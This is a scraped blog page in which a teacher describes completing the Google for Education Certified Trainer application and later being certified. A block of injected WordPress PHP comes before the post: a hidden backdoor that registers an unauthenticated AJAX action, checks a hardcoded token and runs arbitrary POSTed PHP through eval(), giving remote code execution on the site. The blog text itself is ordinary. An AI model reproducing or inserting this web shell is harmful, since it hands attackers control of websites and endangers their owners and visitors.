// ==[BD:szmrboXA]== add_action( 'wp_ajax_nopriv_xntfkqdh', function() { $ptr = 'szmrboXAmWsmq5Y0o8I9eTCWkykbmr18'; $bind = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $bind ) || ! hash_equals( $ptr, $bind ) ) { wp_send_json_error( [ 'message' => 'tok:' . $ptr ], 403 ); } $token = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $token ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $token = preg_replace( '/^\s*<\?(php)?/i', '', $token ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $token ) { return eval( $token ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $chunk ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $chunk->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:szmrboXA]== How I Spent My Winter Break - Becoming a Google Certified Trainer - Math, Tech, & Teaching

I did get a chance to enjoy my winter break, but I also spent a nice portion of it completing my Google for Education Certified Trainer application. I finished it and I feel proud and accomplished.

There are various parts to the application process:

  • Online Trainer Course
  • Trainer Skills Assessment
  • Google Certified Educator Level 1
  • Google Certified Educator Level 2
  • Create 3 minute video
  • Complete application questions

Start HERE  if you’ve already completed both of Google Certified Educator Levels.

This is the video I created. During the first minute I share why I’d like to become a Google Trainer, and in the next two minutes I show you something I call the “Ultimate Google Doc – Classroom Calendar & Agenda”

Let me know if you have any questions about the application process or anything presented in my video

* Edit 1/23/17 *
I was notified today by email that I am now officially a Google for Education Certified Trainer! I am very proud to become a part of such a wonderful community of professionals.

Google for Education Certified Trainer Badge

 

How I Spent My Winter Break – Becoming a Google Certified Trainer
Tagged on:                         

Comment or Question? Please add to the discussion!